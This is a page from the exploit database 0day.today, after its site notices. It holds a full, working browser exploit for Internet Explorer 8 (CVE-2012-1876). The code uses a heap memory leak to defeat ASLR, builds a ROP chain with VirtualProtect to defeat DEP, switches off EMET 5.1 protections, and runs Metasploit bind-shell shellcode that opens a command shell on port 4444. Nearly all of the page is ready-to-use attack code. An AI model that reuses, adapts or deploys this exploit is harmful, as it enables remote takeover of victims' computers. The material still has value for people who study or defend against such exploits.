0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
<!-- ** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass ** Exploit Coded by sickness || EMET 5.1 bypass by ryujin ** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/ ** Affected Software: Internet Explorer 8 ** Vulnerability: Fixed Col Span ID ** CVE: CVE-2012-1876 ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1 --> <html> <body> <div id="evil"></div> <table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table> <script language='javascript'> function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); } var free = "EEEE"; while ( free.length < 500 ) free += free; var string1 = "AAAA"; while ( string1.length < 500 ) string1 += string1; var string2 = "BBBB"; while ( string2.length < 500 ) string2 += string2; var fr = new Array(); var al = new Array(); var bl = new Array(); var div_container = document.getElementById("evil"); div_container.style.cssText = "display:none"; for (var i=0; i < 500; i+=2) { fr[i] = free.substring(0, (0x100-6)/2); al[i] = string1.substring(0, (0x100-6)/2); bl[i] = string2.substring(0, (0x100-6)/2); var obj = document.createElement("button"); div_container.appendChild(obj); } for (var i=200; i<500; i+=2 ) { fr[i] = null; CollectGarbage(); } function heapspray(cbuttonlayout) { CollectGarbage(); var rop = cbuttonlayout + 4161; // RET var rop = rop.toString(16); var rop1 = rop.substring(4,8); var rop2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 11360; // POP EBP var rop = rop.toString(16); var rop3 = rop.substring(4,8); var rop4 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 111675; // XCHG EAX,ESP var rop = rop.toString(16); var rop5 = rop.substring(4,8); var rop6 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12377; // POP EBX var rop = rop.toString(16); var rop7 = rop.substring(4,8); var rop8 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 642768; // POP EDX var rop = rop.toString(16); var rop9 = rop.substring(4,8); var rop10 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12201; // POP ECX --> Changed var rop = rop.toString(16); var rop11 = rop.substring(4,8); var rop12 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5504544; // Writable location var rop = rop.toString(16); var writable1 = rop.substring(4,8); var writable2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12462; // POP EDI var rop = rop.toString(16); var rop13 = rop.substring(4,8); var rop14 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12043; // POP ESI --> changed var rop = rop.toString(16); var rop15 = rop.substring(4,8); var rop16 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 63776; // JMP EAX var rop = rop.toString(16); var jmpeax1 = rop.substring(4,8); var jmpeax2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 85751; // POP EAX var rop = rop.toString(16); var rop17 = rop.substring(4,8); var rop18 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 4936; // VirtualProtect() var rop = rop.toString(16); var vp1 = rop.substring(4,8); var vp2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] var rop = rop.toString(16); var rop19 = rop.substring(4,8); var rop20 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 234657; // PUSHAD var rop = rop.toString(16); var rop21 = rop.substring(4,8); var rop22 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 408958; // PUSH ESP var rop = rop.toString(16); var rop23 = rop.substring(4,8); var rop24 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2228408; // POP ECX var rop = rop.toString(16); var rop25 = rop.substring(4,8); var rop26 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1586172; // POP EAX var rop = rop.toString(16); var rop27 = rop.substring(4,8); var rop28 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] var rop = rop.toString(16); var rop29 = rop.substring(4,8); var rop30 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1884912; // PUSH EAX var rop = rop.toString(16); var rop31 = rop.substring(4,8); var rop32 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2140694; // ADD EAX,ECX var rop = rop.toString(16); var rop33 = rop.substring(4,8); var rop34 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX var rop = rop.toString(16); var rop35 = rop.substring(4,8); var rop36 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX var rop = rop.toString(16); var rop37 = rop.substring(4,8); var rop38 = rop.substring(0,4); // } RET var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW var getmodulew = getmodulew.toString(16); var getmodulew1 = getmodulew.substring(4,8); var getmodulew2 = getmodulew.substring(0,4); // } RET var rop = cbuttonlayout + 3621437; // MOV EAX,EDX var rop = rop.toString(16); var rop41 = rop.substring(4,8); var rop42 = rop.substring(0,4); // } RET var shellcode = unescape("%u4444"); while (shellcode.length < 100) shellcode = shellcode + shellcode; var shellcode = shellcode.substr(0, 46); shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN // EMET disable part 0x01 annihilate ROP protections // Implement the Tachyon detection grid to overcome the Romulan cloaking device. shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u5f3c%u07d2"); // EMET_STRING_PTR (GetModuleHandle argument) shellcode+= unescape("%u7372%u0006"); // Offset to "decoding helper" 0x67372 shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of the "decoding helper") shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN shellcode+= unescape("%u5e84%u07d2"); // Set EBP to successfully return from the "decoding helper" shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN Call the "decoding helper" shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue shellcode+= unescape("%u0000%u0000"); // Compensate for function epilogue shellcode+= unescape("%u"+rop41+"%u"+rop42); // MOV EAX,EDX # RETN shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI # RETN shellcode+= unescape("%u5f38%u07d2"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on) shellcode+= unescape("%u"+rop37+"%u"+rop38); // MOV DWORD PTR DS:[ESI],EAX shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u01b8%u0000"); // offset to NtProtectVirtualMemory unhooked shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory) shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN shellcode+= unescape("%uffff%uffff"); // ProcessHandle shellcode+= unescape("%u5f38%u07d2"); // *BaseAddress shellcode+= unescape("%u5f34%u07d2"); // NumberOfBytesToProtect shellcode+= unescape("%u0040%u0000"); // NewAccessProtection shellcode+= unescape("%u5f30%u07d2"); // OldAccessProtection shellcode+= unescape("%u5f38%u07d2"); // Reget pointer shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u0558%u0000"); // Offset to EMET mitigations switch shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u0000%u0000"); // NULL shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain) shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBX shellcode+= unescape("%u1024%u0000"); // Size 0x00001024 shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX shellcode+= unescape("%u0040%u0000"); // 0x00000040 shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect() shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP // Store various pointers here shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u18eb"); // NOPs shellcode+= unescape("%u4242%u4242"); // OldAccessProtection shellcode+= unescape("%u0564%u0000"); // Size for NtVirtualProtectMemory shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack* shellcode+= "EMET"; // EMET string shellcode+= unescape("%u0000%u0000"); // EMET string shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u9090"); // NOPs // Store various pointers here // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread // MOV EAX,DWORD PTR DS:[076D10BCH] // MOV EAX,DWORD PTR DS:[007D25F48H] // MOV ESI,DWORD PTR [EAX+518H] // SUB ESP,2CCH // MOV DWORD PTR [ESP],10010H // MOV EDI,ESP // MOV ECX,2CCH // ADD EDI,4 // SUB ECX,4 // XOR EAX,EAX // REP STOS BYTE PTR ES:[EDI] // PUSH ESP // PUSH 0FFFFFFFEH // CALL ESI shellcode+= unescape("%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec" + "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" + "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" + "%ufe6a%ud6ff"); shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u9090"); // NOPs // EMET disable part 0x02 end // Bind shellcode on 4444 :) // msf > generate -t js_le // windows/shell_bind_tcp - 342 bytes // http://www.metasploit.com // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= // I would keep the shellcode the same size for better reliability :) shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" + "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" + "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" + "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" + "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" + "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" + "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" + "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" + "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" + "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" + "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" + "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" + "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" + "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" + "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" + "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" + "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" + "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" + "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" + "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" + "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" + "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" + "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" + "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" + "%u006a%uff53%u41d5"); // Total spray should be 1000 var padding = unescape("%u9090"); while (padding.length < 1000) padding = padding + padding; var padding = padding.substr(0, 1000 - shellcode.length); shellcode+= padding; while (shellcode.length < 100000) shellcode = shellcode + shellcode; var onemeg = shellcode.substr(0, 64*1024/2); for (i=0; i<14; i++) { onemeg += shellcode.substr(0, 64*1024/2); } onemeg += shellcode.substr(0, (64*1024/2)-(38/2)); var spray = new Array(); for (i=0; i<100; i++) { spray[i] = onemeg.substr(0, onemeg.length); } } function leak(){ var leak_col = document.getElementById("132"); leak_col.width = "41"; leak_col.span = "19"; } function get_leak() { var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); str_addr = str_addr - 1410704; var hex = str_addr.toString(16); //alert(hex); setTimeout(function(){heapspray(str_addr)}, 50); } function trigger_overflow(){ var evil_col = document.getElementById("132"); evil_col.width = "1312272"; // 0x07D25E40 evil_col.span = "44"; } setTimeout(function(){leak()}, 400); setTimeout(function(){get_leak()},450); setTimeout(function(){trigger_overflow()}, 700); </script> </body> </html> # 0day.today [2024-10-05] #